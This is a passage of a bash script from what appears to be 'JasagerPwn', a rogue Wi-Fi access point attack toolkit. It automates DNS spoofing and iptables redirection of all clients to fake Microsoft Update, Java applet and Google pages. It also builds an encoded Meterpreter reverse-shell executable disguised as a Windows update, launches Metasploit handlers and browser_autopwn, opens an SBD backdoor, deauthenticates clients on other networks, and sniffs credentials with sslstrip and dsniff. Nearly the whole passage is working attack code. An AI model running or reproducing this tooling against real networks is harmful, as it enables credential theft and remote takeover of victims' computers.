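  if [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
    echo -e "\e[01;31m[!]\e[00m No Python PEfile module was detected... Installing.."
    if [ -e "/tmp/pefile-1.2.10-102.tar.gz" ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi
    # NOTE(review): same unauthenticated HTTP fetch as sslstrip above; each step only runs if the
    # previous one succeeded, and the result is verified by the -e check that follows.
    wget -q -P "/tmp" http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz \
      && tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/ \
      && mv /tmp/pefile-1.2.10-102/pefile.py "$SETpath/src/payloadgen/" \
      && chmod +x "$SETpath/src/payloadgen/pefile.py"
    if [ -e "$SETpath/src/payloadgen/pefile.py" ]; then
      echo -e "\e[01;32m[>]\e[00m Installation Complete!"
    else
      echo -e "\e[01;31m[!]\e[00m Installation Failed!"
    fi
    if [ -d "/tmp/pefile-1.2.10-102/" ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi
  fi
fi

#put up monitor interfaces: retry airmon-ng up to 3 times until $MIFACE shows up in ifconfig
monAttempts="0"
while [ -z "$moncheck" ]; do
  if [ "$monAttempts" -ge "3" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Couldn't Start $MIFACE" && cleanup; fi
  xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE"
  moncheck=$(ifconfig | grep "$MIFACE" | awk '{print $1}' | cut -b 4)
  monAttempts=$((monAttempts+1))
done

#copy over DNS compatable persistence script (used by metScript's persistence_dns command)
if [ ! -e "$msfpath/scripts/meterpreter/persistence_dns.rb" ]; then cp src/persistence_dns.rb "$msfpath/scripts/meterpreter/" ; fi

#cleanup www folders. The :? guard aborts instead of running `rm -rf /` should a path be empty.
for d in "$Gwww" "$Jwww" "$Fwww"; do
  if [ -d "$d/" ] ; then rm -rf -- "${d:?}/" ; fi
done
sleep 1 #patience
for d in "$Jwww" "$Fwww" "$Gwww" "/tmp/collected"; do
  if [ ! -d "$d" ]; then mkdir "$d/" ; fi
done
#backup old default index.html
if [ -e /var/www/index.htm ]; then
  mv /var/www/index.htm /var/www/index.htm.OLD
elif [ -e /var/www/index.html ]; then
  mv /var/www/index.html /var/www/index.html.OLD
fi
#fake update page
if [ -d "$Fwww/" ] ; then
  cp -rf src/wwwFakeupdate/* "$Fwww/"
fi
# google page
cp -rf src/wwwGoogle/* "$Gwww/"
# java required page
cp -rf src/wwwJava/* "$Jwww/"

# Update notice. A non-numeric googleRev (e.g. an HTML error page) makes -gt fail quietly.
if [ -n "$googleRev" ] && [ "$googleRev" -gt "$rev" ] 2>/dev/null; then
  echo
  echo -e "\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u"
  echo
fi

echo -e "\e[01;32m[>]\e[00m Creating scripts..."
#Dynamic varaibles incase SET changes, which it does and will.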
SETapache=`cat $SETpath/config/set_config | grep -n "APACHE_SERVER" | awk -F: '{print $1}'` SETapacheDIR=`cat $SETpath/config/set_config | grep -n "APACHE_DIRECT" | awk -F: '{print $1}'` SETredirect=`cat $SETpath/config/set_config | grep -n "AUTO_REDIRECT" | awk -F: '{print $1}'` SETmetscript=`cat $SETpath/config/set_config | grep -n "METERPRETER_MULTI_SCRIPT" | awk -F: '{print $1}'` SETrepeater=`cat $SETpath/config/set_config | grep -n "JAVA_REPEATER=OFF" | awk -F: '{print $1}'` #SET_CONFIG Text Parsing Variables - for javapwn APACHESVR=`cat $SETpath/config/set_config | grep "APACHE_SERVER=ON"` APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"` meterpreterS=`cat $SETpath/config/set_config | grep "METERPRETER_MULTI_SCRIPT=ON"` AREDIRECT=`cat $SETpath/config/set_config | grep "AUTO_REDIRECT=OFF"` JREPEATER=`cat $SETpath/config/set_config | grep "JAVA_REPEATER=ON"` #backup orignal SET config if [ ! -e "$SETpath/config/set_config.ORIGINAL" ]; then cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL fi #Customize SET config to how we want it.. if [ ! "$APACHESVR" ]; then sed ''${SETapache}'s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g' $SETpath/config/set_config > $SETpath/config/set_config2 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ "$APACHESVR" ]; then mv $SETpath/config/set_config $SETpath/config/set_config2 fi sleep 2 if [ ! "$APACHEDIR" ]; then sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g' $SETpath/config/set_config2 > $SETpath/config/set_config3 # > $SEETpath/config/set_configTMP && mv set_configTMP set_config #mv $SETpath/config/set_config $SETpath/config/set_config.leg3nd elif [ "$APACHEDIR" ]; then mv $SETpath/config/set_config2 $SETpath/config/set_config3 fi sleep 2 if [ ! 
"${AREDIRECT}" ]; then sed ''${SETredirect}'s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g' $SETpath/config/set_config3 > $SETpath/config/set_config4 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ ! "$AREDIRECT" ]; then mv $SETpath/config/set_config3 $SETpath/config/set_config4 fi sleep 2 if [ ! "${JREPEATER}" ]; then sed ''${SETrepeater}'s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ "$JREPEATER" ]; then mv $SETpath/config/set_config4 $SETpath/config/set_config5 fi sleep 2 if [ "$autoMetScript" -eq "1" ] && [ ! "$JREPEATER" ]; then #edit for meterpreter script mode # if [ ! "$meterpreterS" ]; then sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config5 > $SETpath/config/set_config6 # > $SETpath/config/set_configTMP && mv set_configTMP set_config # fi elif [ "$autoMetScript" -eq "1" ] && [ "$JREPEATER" ]; then sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5 fi sleep 2 #move config to right spot if [ -e "$SETpath/config/set_config6" ]; then mv $SETpath/config/set_config6 $SETpath/config/set_config fi if [ "$autoMetScript" -eq "0" ] && [ -e "$SETpath/config/set_config5" ] ; then mv $SETpath/config/set_config5 $SETpath/config/set_config elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config5" ] ; then mv $SETpath/config/set_config5 $SETpath/config/set_config elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config6" ] ; then mv $SETpath/config/set_config6 $SETpath/config/set_config fi sleep 3 #make sure we clean up if [ -e "$SETpath/config/set_config2" ]; then rm $SETpath/config/set_config2 ; fi if [ -e "$SETpath/config/set_config3" ]; then rm $SETpath/config/set_config3 ; fi if [ -e "$SETpath/config/set_config4" ]; then rm $SETpath/config/set_config4 ; fi 
if [ -e "$SETpath/config/set_config5" ]; then rm $SETpath/config/set_config5 ; fi if [ -e "$SETpath/config/set_config6" ]; then rm $SETpath/config/set_config6 ; fi #Make loop script to isnure our DNS and IP cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & dnsID2=`echo $!` #Background loop to parse SSLstrip logins #while true; do SSLparse && sleep 5 ; done & #parseID=`echo $!` #DHCP CONF if [ -e "/etc/dhcp3/dhcpd.conf" ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi if [ -e "/tmp/dhcpd.conf" ]; then rm /tmp/dhcpd.conf; fi echo -e "#fakeAP.dhcp ddns-update-style none; one-lease-per-client false; authoritative; ignore client-updates; # Ignore all client requests for DDNS update default-lease-time 60; # 24 hours=86400 max-lease-time 72; # 48 hours=172800 log-facility local7;\n subnet 192.168.10.0 netmask 255.255.255.0 { interface $FONIFACE; range 192.168.10.3 192.168.10.250; option routers 192.168.10.2; option subnet-mask 255.255.255.0; option broadcast-address 192.168.10.255; option domain-name-servers 192.168.10.2; option domain-name \"$DomainName\"; allow unknown-clients; }" >> /etc/dhcp3/dhcpd.conf #backup original SET templates if [ -e "$SETpath/src/html/templates/java/index.template" ]; then mv "$SETpath/src/html/templates/java/index.template" "$SETpath/src/html/templates/java/index.template.ORIGINAL" cp -rf src/wwwJava/* $SETpath/src/html/templates/java/ else cp -rf src/wwwJava/* $SETpath/src/html/templates/java/ fi if [ -e "$SETpath/src/html/templates/google/index.template" ]; then mv "$SETpath/src/html/templates/google/index.template" "$SETpath/src/html/templates/google/index.template.ORIGINAL" cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/ else cp -rf src/wwwGoogle/* 
$SETpath/src/html/templates/google/ fi #Airdrop-ng Deauther CONF #ourAPmac=`macchanger -s $MIFACE | awk '{ print $3 }' | tr '[a-z]' '[A-Z]'` if [ -e "/tmp/deauth.conf" ] ; then rm "/tmp/deauth.conf" ; fi echo "# Jasager - deauth.conf v$version a/$ourAPmac|any a/00:00:00:00:00:00|any d/any|any" > /tmp/deauth.conf #Add our wifi gateway if needed wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` if [ $WiFiMODE -eq "1" ]; then newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'` echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf #elif [ ! $wifiMAC ] || [ ! $newIFACEmac ]; then #echo #echo -e "\e[01;31m[!]\e[00m Error: Your Wireless Connection Has no MAC Address.." #echo fi #Host file - MITM WEBSITE if test -e /tmp/BP.dns; then rm /tmp/BP.dns; fi echo "$fonIP *" > /tmp/BP.dns #Vhosts javapwn vhost="/etc/apache2/sites-available/javapwn" if [ -e "$vhost" ] ; then rm "$vhost"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Jwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Jwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. 
LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.html ErrorDocument 404 /index.html </VirtualHost>" >> $vhost #Vhosts google vhost2="/etc/apache2/sites-available/google" if [ -e "$vhost2" ] ; then rm "$vhost2"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Gwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Gwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. 
LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.html ErrorDocument 404 /index.html </VirtualHost>" >> $vhost2 #Vhosts fakeupdate vhost3="/etc/apache2/sites-available/fakeupdate" if [ -e "$vhost3" ] ; then rm "$vhost3"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Fwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Fwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.php ErrorDocument 404 /index.php </VirtualHost>" >> $vhost3 #SET automate scripts, can be TOUCHY. #run as template rather then imported if [ -e "/tmp/auto-java2" ] ; then rm "/tmp/auto-java2" ; fi echo -e "\n2\n1\n1\n1\n2\n16" > /tmp/auto-java2 # echo -e "2 # 1 # 1 # 1 # 2 # 16" > /tmp/auto-java2 #run as template rather then imported if [ -e "/tmp/auto-google2" ] ; then rm "/tmp/auto-google2" ; fi echo -e "\n2\n1\n1\n3\n2\n16" > /tmp/auto-google2 # echo -e "2 # 1 # 1 # 3 # 2 # 16" > /tmp/auto-google2 #DIFFERENT METHOD OF USING THE TEMPLATES. 
#fancy clone of java DL website - not used # if [ -e "/tmp/auto-java" ] ; then rm "/tmp/auto-java" ; fi # echo -e "2 # 1 # 3 # $pwd/src/wwwJava/ # 2 # 16" > /tmp/auto-java #fancy clone of google - not used # if [ -e "/tmp/auto-google" ] ; then rm "/tmp/auto-google" ; fi # echo -e "2 # 1 # 3 # $pwd/src/wwwGoogle/ # 2 # 16" > /tmp/auto-google if [ $autoMetScript -eq 1 ]; then metScript #Metasploit rc w/ auto script if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi echo -e "use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set ExitOnSession false set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file exploit -j" > /tmp/msfrc #Metasploit rc w/ auto script BP if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi echo -e "use auxiliary/server/browser_autopwn set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set SRVPORT 80 set SRVHOST $ourIP set URIPATH / set ExitOnSession false set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file run -j" > /tmp/msfrcBP elif [ $autoMetScript -eq 0 ]; then #Metasploit rc no auto script if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi echo -e "use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set ExitOnSession false exploit -j" > /tmp/msfrc #Metasploit rc no auto script BP if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi echo -e "use auxiliary/server/browser_autopwn set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set SRVPORT 80 set SRVHOST $ourIP set URIPATH / set ExitOnSession false run -j" > /tmp/msfrcBP fi sleep 1 #USING DNS VIA IPTABLES TO GATEWAY #echo -e "\e[01;32m[>]\e[00m Starting DNS services..." 
#xterm -geometry 75x5+0+94 -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - Tunnel DNS" -e "while true; do sleep 60 && echo 'Tunneling $ourIP DNS Requests through $gatewayIP...';done" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - DNS" -e "dnsmasq -C /tmp/Jasager.dnsmasq" & #DNSID=`echo $!` echo -e "\e[01;32m[>]\e[00m Enabling ipv4 Forwarding..." xterm -geometry 0x0+0+0 -e "modprobe tun" & echo "1" > /proc/sys/net/ipv4/ip_forward #tail messages for DHCP info xterm -geometry 75x16+0+509 -bg black -fg red -T "[JasagerPwn-DHCP] v$version" -e "tail -f /var/log/messages | grep DHCP" & messageID=`echo $!` echo -e "\e[01;32m[>]\e[00m Starting up DHCP3..." xterm -geometry 75x9+0+474 -bg black -fg green -T "Starting DHCP3 Server" -e "/etc/init.d/dhcp3-server start" & echo -e "\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet..." xterm -geometry 0x0+0+0 -e "driftnet -v -s -i $FONIFACE" & xterm -geometry 75x24+464+405 -bg black -fg green -T "[JasagerPwn-DSniff] v$version" -e "dsniff -i $FONIFACE" & dsniffID=`echo $!` xterm -geometry 75x37+0+0 -bg black -fg green -T "[JasagerPwn-URLSnarf] v$version" -e "urlsnarf -i $FONIFACE" & echo -e "\e[01;32m[>]\e[00m Setting up IP Tables..." IPTABLES echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version Started! 
More @ www.info-s3curity.com" echo #MAIN OPTIONS FOR AP ATTACKS while true do echo echo echo ifconfig $FONIFACE $fonIP echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m" echo -e "\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m" echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m" #echo -e "\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it " if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then echo -e "\e[01;36m [*] Attack Status: Idle..\e[00m" elif [ $sniffing -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: SSLstrip & Sniffing\e[00m" elif [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: MSF Browser-AutoPwn\e[00m" elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: MSF Fake Update\e[00m" elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: SET Java Applet\e[00m" fi echo -e "\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network." echo -e "\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Microsoft Update Page. (MS Only)" echo -e "\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn. (Any OS)" echo -e "\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page. (Any OS) " echo -e "\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs." echo -e "\e[01;32m[-]\e[00m [6][N] = Adjust Network and Internet Settings" echo -e "\e[01;32m[-]\e[00m [7][X] = Exit Jasager Script" echo -n -e "\e[01;31m [?] Choose an attack for AP:\e[00m " read -e CONFIRM3 echo case $CONFIRM3 in s|S|sniff|Sniff|1) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." 
elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict." elif [ $sniffing -eq 0 ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" & if [ -e sslstrip.log ]; then xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` else touch sslstrip.log xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` fi echo -e "\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing" wasSniffing="1" sniffing="1" elif [ $sniffing -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Your Already Sniffing!!" fi #xterm -geometry 75x20+464+288 -bg black -fg green -e "dsniff -i $FONIFACE" & ;; J|j|java|Java|4) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict." elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict." 
elif [ $javaATK -eq 0 ]; then echo -n -e "\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required: " read -e JavaSite case $JavaSite in G|g|Google|google|1) if [ $autoMetScript -eq 1 ]; then metScript; fi javasite="1" JavaSite xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google && /etc/init.d/apache2 reload" xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-google2" & ;; J|j|Java|java|2) if [ $autoMetScript -eq 1 ]; then metScript; fi javasite="2" && sleep 1 JavaSite xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn && /etc/init.d/apache2 reload" xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-java2" & ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac echo -n -e "\e[01;34m[*]\e[00m Press [ENTER] when SET is ready.." read -e $blahblahblah ipTableRedirect if [ $autoMetScript -eq 1 ]; then metScript; fi echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE #Check for bad index.html.. whys it index2.html? lolwtf if [ -e "$SETpath/src/web_clone/site/template/index2.html" ] && [ ! 
-e "$SETpath/src/web_clone/site/template/index.html" ]; then mv "$SETpath/src/web_clone/site/template/index2.html" "$SETpath/src/web_clone/site/template/index.html" fi if [ -e "/var/www/javapwn/index2.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then mv "/var/www/javapwn/index2.html" "/var/www/javapwn/index.html" fi xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & sleep 2 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & javaATK="1" fi while true do if [ $browserpwn -eq 1 ]; then break; fi if [ $fakeupdate -eq 1 ]; then break; fi #echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: " #read -e $CONFIRM7 echo echo -e "\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m" echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE9 #read -r -p "[?] 
Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE9 case $USR_CHOICE9 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & javaATK="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!" break ;; M|m|Menu|menu|2) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; F|f|fakeupdate|Fakeupdate|2) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." elif [ $fakeupdate -eq 0 ]; then if [ $autoMetScript -eq 1 ]; then metScript; fi echo -e "\e[01;33m[!]\e[00m Creating Exploit (Windows)..." 
xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Windows)" -e "msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP R | msfencode -x $Fwww/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/Windows-KB183905-x86-ENU.exe" echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." ipTableRedirect #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE #xterm -geometry 110x42+464-38 -bg black -fg green -T "[MFU Handler] v$version - Metasploit" -e "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP E" & xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version - Metasploit" -e "msfconsole -r /tmp/msfrc" & echo -e "\e[01;33m[!]\e[00m Getting the backdoor (SBD) ready..." xterm -geometry 75x22+10+450 -bg black -fg green -T "[JasagerPwn-SBD] v$version - SBD" -e "sbd -l -k leg3nd -p $port" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & sleep 3 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & fakeupdate="1" echo -e "\e[01;32m[>]\e[00m Starting Web Server @ $ourIP:80..." xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload" fi while true do if [ $browserpwn -eq 1 ]; then break; fi if [ $javaATK -eq 1 ]; then break; fi #echo -n "[?] 
Enter [I] to give Internet back or [M] for Main Menu: " #read -e $CONFIRM7 echo echo -e "\e[01;33m[MODE][==========-FakeUpdate Metasploit-==========][!]\e[00m" #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE1 echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE1 case $USR_CHOICE1 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version" -e "/etc/init.d/apache2 stop" & fakeupdate="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!" break ;; M|m|Menu|menu|2) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; B|b|browserpwn|browserPwn|3) if [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port 